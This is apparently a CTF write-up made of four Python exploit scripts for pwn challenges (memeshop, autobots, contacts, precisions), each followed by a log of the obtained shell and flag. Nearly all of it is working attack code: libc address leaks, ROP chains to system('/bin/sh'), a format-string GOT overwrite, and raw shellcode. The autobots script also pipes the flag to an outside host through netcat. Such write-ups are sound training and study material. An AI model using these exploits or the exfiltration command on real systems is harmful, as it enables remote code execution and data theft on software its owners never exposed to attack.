memeshop (400)

import socket, telnetlib, sys, time
import hashlib, zlib, random
from struct import pack, unpack
from subprocess import check_output

'''
PREPARE FUNCTIONS
Reuse
'''

def sock(HOST, PORT, debug=True):
	"""Open a TCP connection to (HOST, PORT) and return the connected socket.

	No timeout is set, so any later recv() on the socket may block
	indefinitely if the peer goes quiet.  A failed connect raises
	socket.error; callers do not catch it.
	"""
	conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	conn.connect((HOST, PORT))
	if debug:
		print("[+] Connected to server")
	return conn

def telnet(s):
	"""Attach an interactive telnetlib session to the already-connected socket *s*.

	Telnet.interact() relays stdin to the socket and socket output to stdout
	until the connection closes.  telnetlib is deprecated since Python 3.11
	and removed in 3.13, so this only works on older interpreters.
	"""
	session = telnetlib.Telnet()
	session.sock = s
	session.interact()

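def send(s, m, debug = True):
	"""Write the whole of *m* to socket *s*, optionally echoing it first.

	Uses sendall() instead of send(): the original ignored send()'s return
	value, so a partial write could silently drop the tail of the message.
	A text *m* (Python 3 str) is encoded as latin-1; on Python 2 str is
	already bytes and passes through unchanged.
	"""
	if debug:
		print("[+] Send: " + repr(m))
	if isinstance(m, str) and not isinstance(m, bytes):
		m = m.encode("latin-1")
	s.sendall(m)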

def recv(s, debug = True):
	"""Read up to 4096 bytes from *s* and return them (empty on EOF)."""
	chunk = s.recv(4096)
	if debug:
		print("[+] Recv\n" + repr(chunk))
	return chunk

def recv_full(s, debug = True):
	"""Drain *s* in 4096-byte reads until one read comes back short.

	A short read is taken to mean "no more data".  That is only a
	heuristic: TCP may hand back fewer than 4096 bytes while more is
	still in flight, so the result can be truncated.
	"""
	parts = []
	chunk = recv(s, False)
	parts.append(chunk)
	while len(chunk) >= 4096:
		chunk = recv(s, False)
		parts.append(chunk)
	data = b"".join(parts)
	if debug:
		print("[+] Recv\n" + repr(data))
	return data

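def recv_until(s, m, debug = True):
	"""Read *s* one byte at a time until the data received contains *m*.

	Returns everything read, marker included.  Raises EOFError if the peer
	closes the connection before *m* appears; the original kept looping
	forever because recv() then returns an empty string on every call.
	A text marker (Python 3 str) is matched after latin-1 encoding.
	"""
	marker = m
	if isinstance(marker, str) and not isinstance(marker, bytes):
		marker = marker.encode("latin-1")
	data = b""
	while marker not in data:
		byte = s.recv(1)
		if not byte:
			raise EOFError("connection closed before %r was received" % (m,))
		data += byte
	if debug:
		print("[+] Recv\n" + repr(data))
	return data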

def p(m):
	"""Pack integer *m* as a little-endian unsigned 64-bit value (8 bytes).

	Raises struct.error if *m* is negative or does not fit in 64 bits.
	"""
	fmt = "<Q"
	return pack(fmt, m)

def u(m):
	"""Unpack an 8-byte little-endian unsigned value from *m*.

	Raises struct.error unless *m* is exactly 8 bytes long.
	"""
	(value,) = unpack("<Q", m)
	return value

# Remote challenge endpoint as recorded in the writeup; hard-coded, and sock() sets no timeout.
s = sock("52.3.190.202", 1337)

# Menu dialogue: option "p", then a base64-encoded path at the "number bro: " prompt.
recv_until(s, "uit\n", False)
send(s, "p\n")
recv_until(s, "number bro: ", False)
send(s, "L3Byb2Mvc2VsZi9tYXBz\n")
# The reply is parsed for the libc-2.19.so mapping: text before that path, its last line,
# then the hex start address before the "-".  int() raises ValueError if the reply does
# not contain exactly that library path (e.g. a different libc build).
add_libc = int(recv_until(s, "uit\n", False).split("/lib/x86_64-linux-gnu/libc-2.19.so")[0].split('\n')[-1].split('-')[0], 16)

# 0x000000000001f4c3 : xchg eax, esp ; ret
# 0x000000000001f7a6 : pop rdi ; pop rbp ; ret
# 0x0000000000022b1a : pop rdi ; ret

# All offsets are relative to the leaked base and specific to the libc-2.19 build named above.
add_system = add_libc + 0x46640
add_binsh = add_libc + 0x17ccdb
add_change = add_libc + 0x1f4c3
add_stack2 = add_libc + 0x22b1a
add_stack3 = add_libc + 0x1f7a6

#Test Local
#add_libc = 0x7ffff7538000
#magic = 0x000000000004652C (execv binsh)
#k = 'm\nGqtV9/9/AADDdFX3/38AAKZ3Vff/fwAA20xr9/9/AABhYWFhYWFhYUDmV/f/fwAA\n'
#(python -c "import sys; k = 'm\nGqtV9/9/AADDdFX3/38AAKZ3Vff/fwAA20xr9/9/AABhYWFhYWFhYUDmV/f/fwAA\n'; sys.stdout.write('n\n'*256+k);"; cat)

print "[+] Address base =", hex(add_libc)

# Six 8-byte fields (five packed addresses plus 8 bytes of filler), then the Python 2
# str codec "base64", which inserts a newline every 76 characters plus a trailing one.
# That codec is not available on str in Python 3.
answer = p(add_stack2) + p(add_change) + p(add_stack3) + p(add_binsh) + 'a'*8 + p(add_system)
answer = answer.encode("base64")

print "[+] Send 256 nicolas cage"

# 256 rounds of "n"; each reply is drained to the "uit\n" marker so the next send
# starts from a known point in the dialogue.  recv_until() blocks forever if the
# marker never arrives.
for i in range(256):
	print "[+]", i+1
	send(s, "n\n", False)
	recv_until(s, "uit\n", False)

print "[+] Send"

print "[+] Send skeletal for sure"

# Option "m", then the encoded payload, then option "c".
send(s, "m\n", False)
recv_until(s, "mr skeletal?\n", False)
send(s, answer + "\n", False)
recv_until(s, "uit\n", False)

send(s, "c\n", False)
print "[+] Shell on!"

# Hand the same socket over to an interactive session.
telnet(s)

s.close()

'''
▶ python meme.py 
[+] Connected to server
[+] Send: 'p\n'
[+] Send: 'L3Byb2Mvc2VsZi9tYXBz\n'
[+] Address base = 0x7f3d62dbd000
[+] Send 256 nicolas cage
[+] 1
[+] 2
....
[+] 256
[+] Send
[+] Send skeletal for sure
[+] Shell on!
cd ..
cat flag
flag{dwn: please tell us your meme. I'm not going to stop asking}
'''

autobots (350)

import socket, telnetlib, sys, time
import hashlib, zlib, random
from struct import pack, unpack
from subprocess import check_output

'''
PREPARE FUNCTIONS
Reuse
'''

def sock(HOST, PORT, debug=True):
	"""Open a TCP connection to (HOST, PORT) and return the connected socket.

	No timeout is set, so any later recv() on the socket may block
	indefinitely if the peer goes quiet.  A failed connect raises
	socket.error; callers do not catch it.
	"""
	conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	conn.connect((HOST, PORT))
	if debug:
		print("[+] Connected to server")
	return conn

def telnet(s):
	"""Attach an interactive telnetlib session to the already-connected socket *s*.

	Telnet.interact() relays stdin to the socket and socket output to stdout
	until the connection closes.  telnetlib is deprecated since Python 3.11
	and removed in 3.13, so this only works on older interpreters.
	"""
	session = telnetlib.Telnet()
	session.sock = s
	session.interact()

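def send(s, m, debug = True):
	"""Write the whole of *m* to socket *s*, optionally echoing it first.

	Uses sendall() instead of send(): the original ignored send()'s return
	value, so a partial write could silently drop the tail of the message.
	A text *m* (Python 3 str) is encoded as latin-1; on Python 2 str is
	already bytes and passes through unchanged.
	"""
	if debug:
		print("[+] Send: " + repr(m))
	if isinstance(m, str) and not isinstance(m, bytes):
		m = m.encode("latin-1")
	s.sendall(m)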

def recv(s, debug = True):
	"""Read up to 4096 bytes from *s* and return them (empty on EOF)."""
	chunk = s.recv(4096)
	if debug:
		print("[+] Recv\n" + repr(chunk))
	return chunk

def recv_full(s, debug = True):
	"""Drain *s* in 4096-byte reads until one read comes back short.

	A short read is taken to mean "no more data".  That is only a
	heuristic: TCP may hand back fewer than 4096 bytes while more is
	still in flight, so the result can be truncated.
	"""
	parts = []
	chunk = recv(s, False)
	parts.append(chunk)
	while len(chunk) >= 4096:
		chunk = recv(s, False)
		parts.append(chunk)
	data = b"".join(parts)
	if debug:
		print("[+] Recv\n" + repr(data))
	return data

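def recv_until(s, m, debug = True):
	"""Read *s* one byte at a time until the data received contains *m*.

	Returns everything read, marker included.  Raises EOFError if the peer
	closes the connection before *m* appears; the original kept looping
	forever because recv() then returns an empty string on every call.
	A text marker (Python 3 str) is matched after latin-1 encoding.
	"""
	marker = m
	if isinstance(marker, str) and not isinstance(marker, bytes):
		marker = marker.encode("latin-1")
	data = b""
	while marker not in data:
		byte = s.recv(1)
		if not byte:
			raise EOFError("connection closed before %r was received" % (m,))
		data += byte
	if debug:
		print("[+] Recv\n" + repr(data))
	return data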

def p(m):
	"""Pack integer *m* as a little-endian unsigned 64-bit value (8 bytes).

	Raises struct.error if *m* is negative or does not fit in 64 bits.
	"""
	fmt = "<Q"
	return pack(fmt, m)

def u(m):
	"""Unpack a 4-byte little-endian unsigned value from *m*.

	Raises struct.error unless *m* is exactly 4 bytes long.
	"""
	(value,) = unpack("<I", m)
	return value

def uu(m):
	"""Unpack an 8-byte little-endian unsigned value from *m*.

	Raises struct.error unless *m* is exactly 8 bytes long.
	"""
	(value,) = unpack("<Q", m)
	return value


# Fixed addresses inside the target binary (0x40xxxx, presumably a non-PIE build);
# values as recorded by the author.
add_1stjmp = 0x4008CA
add_2stjmp = 0x4008B0


# NOTE(review): add_write is a constant here, not a value read back from the server;
# the commented-out block at the end shows the leak it was meant to come from.  Every
# libc-relative address below is only correct if this constant matches the target.
add_write = 0x7ffff7b00860
add_libc = add_write - 0xeb860
add_system = add_libc + 0x46640
add_pop_rdi = add_libc + 0x22b1a #gadget
add_magic = add_libc + 0x3BE100 #memory address has permission read/write

#get address of write in server

# Reconnect loop: read at least 2780 bytes of banner, pull three 32-bit fields from
# fixed offsets, and retry (after a 0.2 s pause) until they look plausible.
while True:
	time.sleep(0.2)
	s = sock('54.86.195.190', 8888)
	data = ""
	# NOTE: if the peer closes early, recv() returns "" and this loop never ends.
	while len(data)<2780: data += recv(s, False)
	port = u(data[0x7d5:0x7d9])
	# The field is taken as 2^32 minus its value, i.e. read as a negative 32-bit offset.
	off_buf = 0x100000000-u(data[0x827:0x827+4])
	max_len = u(data[0x82f:0x82f+4])
	print "Port:", port
	print "Stack:", off_buf
	print "Read size:", max_len
	if port>100000 or off_buf>1000:
		s.close()
		continue
	
	#get write func address -> system address
	#pay = p(add_1stjmp) + p(0) + p(1) + p(0x601018) + p(100) + p(0x601018) + p(6) + p(add_2stjmp)


	#write string in valid memory , pop rdi from stack, call system
	pay = p(add_1stjmp) + p(0) + p(1) + p(0x601038) + p(100) + p(add_magic) + p(6) + p(add_2stjmp)
	pay += 'aaaaaaaa'*7 + p(add_pop_rdi) + p(add_magic) + p(add_system)

	# Give up on this connection when the padded payload would exceed the advertised read size.
	if len(pay)+off_buf+8>=max_len: s.close(); continue
	pay = 'a'*(off_buf+8) + pay

	# Second connection to the port parsed from the banner.
	s2 = sock('54.86.195.190', port)
	send(s2, pay)
	
	#send command from part 2
	#listen on another host, to receive output
	send(s2, "cat flag | nc trich.im 9999\x00")
	#--------

	data = recv(s2)

	s2.close()
	s.close()

	break

'''
data = data[0:8]
add_write = uu(data)
print "[+] Address write", hex(add_write)
'''

#flag{c4nt_w4it_f0r_cgc_7h15_y34r}

contacts (250)

import socket, telnetlib, sys, time
import hashlib, zlib, random
from struct import pack, unpack
from subprocess import check_output

'''
PREPARE FUNCTIONS
Reuse
'''

def sock(HOST, PORT, debug=True):
	"""Open a TCP connection to (HOST, PORT) and return the connected socket.

	No timeout is set, so any later recv() on the socket may block
	indefinitely if the peer goes quiet.  A failed connect raises
	socket.error; callers do not catch it.
	"""
	conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	conn.connect((HOST, PORT))
	if debug:
		print("[+] Connected to server")
	return conn

def telnet(s):
	"""Attach an interactive telnetlib session to the already-connected socket *s*.

	Telnet.interact() relays stdin to the socket and socket output to stdout
	until the connection closes.  telnetlib is deprecated since Python 3.11
	and removed in 3.13, so this only works on older interpreters.
	"""
	session = telnetlib.Telnet()
	session.sock = s
	session.interact()

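def send(s, m, debug = True):
	"""Write the whole of *m* to socket *s*, optionally echoing it first.

	Uses sendall() instead of send(): the original ignored send()'s return
	value, so a partial write could silently drop the tail of the message.
	A text *m* (Python 3 str) is encoded as latin-1; on Python 2 str is
	already bytes and passes through unchanged.
	"""
	if debug:
		print("[+] Send: " + repr(m))
	if isinstance(m, str) and not isinstance(m, bytes):
		m = m.encode("latin-1")
	s.sendall(m)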

def recv(s, debug = True):
	"""Read up to 4096 bytes from *s* and return them (empty on EOF)."""
	chunk = s.recv(4096)
	if debug:
		print("[+] Recv\n" + repr(chunk))
	return chunk

def recv_full(s, debug = True):
	"""Drain *s* in 4096-byte reads until one read comes back short.

	A short read is taken to mean "no more data".  That is only a
	heuristic: TCP may hand back fewer than 4096 bytes while more is
	still in flight, so the result can be truncated.
	"""
	parts = []
	chunk = recv(s, False)
	parts.append(chunk)
	while len(chunk) >= 4096:
		chunk = recv(s, False)
		parts.append(chunk)
	data = b"".join(parts)
	if debug:
		print("[+] Recv\n" + repr(data))
	return data

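def recv_until(s, m, debug = True):
	"""Read *s* one byte at a time until the data received contains *m*.

	Returns everything read, marker included.  Raises EOFError if the peer
	closes the connection before *m* appears; the original kept looping
	forever because recv() then returns an empty string on every call.
	A text marker (Python 3 str) is matched after latin-1 encoding.
	"""
	marker = m
	if isinstance(marker, str) and not isinstance(marker, bytes):
		marker = marker.encode("latin-1")
	data = b""
	while marker not in data:
		byte = s.recv(1)
		if not byte:
			raise EOFError("connection closed before %r was received" % (m,))
		data += byte
	if debug:
		print("[+] Recv\n" + repr(data))
	return data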

def p(m):
	"""Pack integer *m* as a little-endian unsigned 32-bit value (4 bytes).

	Raises struct.error if *m* is negative or does not fit in 32 bits.
	"""
	fmt = "<I"
	return pack(fmt, m)

def u(m):
	"""Unpack a 4-byte little-endian unsigned value from *m*.

	Raises struct.error unless *m* is exactly 4 bytes long.
	"""
	(value,) = unpack("<I", m)
	return value

def displayrecord(s):
	"""Select menu option 4 on *s* and return the service output up to the next ">>> " prompt."""
	send(s, "4\n", False)
	reply = recv_until(s, ">>> ", False)
	print("[+] Trigger fmt/Leak data")
	return reply

def addrecord(s, name, phone, length, desc):
	"""Create a record through menu option 1.

	Answers the four prompts in the order the service asks them (name,
	phone, description length, description text), each value followed by
	a newline, then waits for the ">>> " prompt.  Every field, including
	*length*, is sent as the string it was given.
	"""
	prompts = (
		("Name: ", name),
		("Enter Phone No: ", phone),
		("description: ", length),
		("description:\n\t\t", desc),
	)
	send(s, "1\n", False)
	for expected, value in prompts:
		recv_until(s, expected, False)
		send(s, value + "\n", False)
	recv_until(s, ">>> ", False)
	print("[+] Add record '%s'" % name)

def editrecord(s, name, newname):
	"""Rename the record *name* to *newname* through menu option 3.

	Two edit sessions are run.  The first chooses sub-option 2 and appears
	to resize and rewrite the description (length "200", fixed filler
	text); the second chooses sub-option 1 and sets the new name.  Each
	session first selects the record by *name* and waits for ">>> ".
	"""
	def open_record():
		send(s, "3\n", False)
		recv_until(s, "change? ", False)
		send(s, name + "\n", False)
		recv_until(s, ">>> ", False)

	# Session 1: sub-option 2.
	open_record()
	send(s, "2\n", False)
	recv_until(s, "description: ", False)
	send(s, "200\n", False)
	recv_until(s, "Description: \n\t", False)
	send(s, "this is test desc\n", False)
	recv_until(s, ">>> ", False)

	# Session 2: sub-option 1.
	open_record()
	send(s, "1\n", False)
	recv_until(s, "New name: ", False)
	send(s, newname + "\n", False)
	recv_until(s, ">>> ", False)
	print("[+] Edit record '%s'" % name)
	

#s = sock("192.168.56.103",9999) (local)
# Remote challenge endpoint as recorded in the writeup; hard-coded, no timeout.
s = sock("54.165.223.128",2555)

recv_until(s, ">>> ", False)

#add 2 record
# Three records are created (the comment above says two); the second and third names
# are reused below as the trailing strings of the payloads.
addrecord(s, "chim", "abc", "10", "xyz")
addrecord(s, "trich", "abc", "10", "xyz")
addrecord(s, "tri", "abc", "10", "xyz")

#leak strcmp/printf address
# Fixed addresses as recorded by the author (contact table and the two entries the
# author labels strcmp/free); they are specific to this build of the challenge binary.
addr_contact = 0x804b0a0
addr_strcmp = 0x0804B00C
addr_free = 0x0804B014

# Layout used by the author: a NUL-terminated name padded to 64 bytes, four 32-bit
# words, then the next record's name.
pay1 = 'chim\x00'
pay1 += 'a'*(64-len(pay1))
pay1 += p(1)*2 + p(addr_contact+8) + p(addr_strcmp)
pay1 += "trich"

editrecord(s, "chim", pay1)
# split()[2] raises IndexError if the listing holds fewer than three "Phone #: " fields.
data = displayrecord(s).split("Phone #: ")[2]

# 32-bit value at offset 4 of that segment; the system address is derived with a fixed,
# libc-build-specific delta (the local variant is kept commented out).
leak_printf = u(data[4:8])
#leak_system = leak_printf - 60144 (local)
leak_system = leak_printf - 53104

print "[+] Leak printf = %s, system = %s" % (hex(leak_printf), hex(leak_system))

#write got/free

# The 32-bit value is split into two 16-bit halves, each carried by a "%<n>c%10$hn"
# name; the two payloads differ only in the trailing words (addr_free vs addr_free+2).
f_short1 = leak_system & 0xffff
f_short2 = leak_system >> 16

name1 = "%" + str(f_short1) + "c%10$hn"
pay2 = name1 + "\x00"
pay2 += 'a'*(64-len(pay2))
pay2 += p(1)*2 + p(addr_contact+8) + p(addr_free)

name2 = "%" + str(f_short2) + "c%10$hn"
pay3 = name2 + "\x00"
pay3 += 'a'*(64-len(pay3))
pay3 += p(1)*2 + p(addr_contact+80+8) + p(addr_free+2)
pay3 += "tri"

payload = pay2 + pay3

editrecord(s, "chim", payload)
displayrecord(s)


#get shell
addrecord(s, "shell", "01278797xx", "10", "/bin/sh")

# Menu option 2 (remove) on the record just added.
send(s, "2\n", False)
recv_until(s, "remove? ", False)
send(s, "shell\n", False)

print "[+] SHELL"
telnet(s)

s.close()

'''
▶ python chim_contact.py
[+] Connected to server
[+] Add record 'chim'
[+] Add record 'trich'
[+] Add record 'tri'
[+] Edit record 'chim'
[+] Trigger fmt/Leak data
[+] Leak printf = 0xf764ac40, system = 0xf763dcd0
[+] Edit record 'chim'
[+] Trigger fmt/Leak data
[+] Add record 'shell'
[+] SHELL
cat flag
flag{f0rm47_s7r1ng5_4r3_fun_57uff}
'''

precisions (100)

import socket, telnetlib, sys, time
import hashlib, zlib, random
from struct import pack, unpack
from subprocess import check_output

'''
PREPARE FUNCTIONS
Reuse
'''

def sock(HOST, PORT, debug=True):
	"""Open a TCP connection to (HOST, PORT) and return the connected socket.

	No timeout is set, so any later recv() on the socket may block
	indefinitely if the peer goes quiet.  A failed connect raises
	socket.error; callers do not catch it.
	"""
	conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	conn.connect((HOST, PORT))
	if debug:
		print("[+] Connected to server")
	return conn

def telnet(s):
	"""Attach an interactive telnetlib session to the already-connected socket *s*.

	Telnet.interact() relays stdin to the socket and socket output to stdout
	until the connection closes.  telnetlib is deprecated since Python 3.11
	and removed in 3.13, so this only works on older interpreters.
	"""
	session = telnetlib.Telnet()
	session.sock = s
	session.interact()

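def send(s, m, debug = True):
	"""Write the whole of *m* to socket *s*, optionally echoing it first.

	Uses sendall() instead of send(): the original ignored send()'s return
	value, so a partial write could silently drop the tail of the message.
	A text *m* (Python 3 str) is encoded as latin-1; on Python 2 str is
	already bytes and passes through unchanged.
	"""
	if debug:
		print("[+] Send: " + repr(m))
	if isinstance(m, str) and not isinstance(m, bytes):
		m = m.encode("latin-1")
	s.sendall(m)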

def recv(s, debug = True):
	"""Read up to 4096 bytes from *s* and return them (empty on EOF)."""
	chunk = s.recv(4096)
	if debug:
		print("[+] Recv\n" + repr(chunk))
	return chunk

def recv_full(s, debug = True):
	"""Drain *s* in 4096-byte reads until one read comes back short.

	A short read is taken to mean "no more data".  That is only a
	heuristic: TCP may hand back fewer than 4096 bytes while more is
	still in flight, so the result can be truncated.
	"""
	parts = []
	chunk = recv(s, False)
	parts.append(chunk)
	while len(chunk) >= 4096:
		chunk = recv(s, False)
		parts.append(chunk)
	data = b"".join(parts)
	if debug:
		print("[+] Recv\n" + repr(data))
	return data

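def recv_until(s, m, debug = True):
	"""Read *s* one byte at a time until the data received contains *m*.

	Returns everything read, marker included.  Raises EOFError if the peer
	closes the connection before *m* appears; the original kept looping
	forever because recv() then returns an empty string on every call.
	A text marker (Python 3 str) is matched after latin-1 encoding.
	"""
	marker = m
	if isinstance(marker, str) and not isinstance(marker, bytes):
		marker = marker.encode("latin-1")
	data = b""
	while marker not in data:
		byte = s.recv(1)
		if not byte:
			raise EOFError("connection closed before %r was received" % (m,))
		data += byte
	if debug:
		print("[+] Recv\n" + repr(data))
	return data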

def p(m):
	"""Pack integer *m* as a little-endian unsigned 32-bit value (4 bytes).

	Raises struct.error if *m* is negative or does not fit in 32 bits.
	"""
	fmt = "<I"
	return pack(fmt, m)

def u(m):
	"""Unpack a 4-byte little-endian unsigned value from *m*.

	Raises struct.error unless *m* is exactly 4 bytes long.
	"""
	(value,) = unpack("<I", m)
	return value


# Remote challenge endpoint as recorded in the writeup; hard-coded, no timeout.
s = sock("54.173.98.115", 1259)
# Takes the hex value after the first " 0x" in a single recv().  A short or split read
# makes split()[1] raise IndexError, or int() raise ValueError on a truncated number.
data = int(recv(s, False).strip().split(' 0x')[1], 16)
print "[+] Address", hex(data)
# Machine-code string taken verbatim from the writeup; its length drives the padding below.
shell = "\x6a\x0f\x58\x83\xe8\x04\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"

# Payload layout: shell padded to 0x80 bytes, an 8-byte constant, 12 bytes of filler,
# then the parsed address as a 32-bit little-endian word.
pay = shell + 'a'*(0x80-len(shell)) + '\xA5\x31\x5A\x47\x55\x15\x50\x40' + 'aaaa'*3 + p(data) 
send(s, pay + "\n", False)
print "[+] Send payload"
recv(s, False)

print "[+] Get shell"
telnet(s)

s.close()

'''
▶ python precision.py
[+] Connected to server
[+] Address 0xfff260e8
[+] Send payload
[+] Get shell
cat flag
flag{1_533_y0u_kn0w_y0ur_w4y_4r0und_4_buff3r}
'''

Enjoy 🙂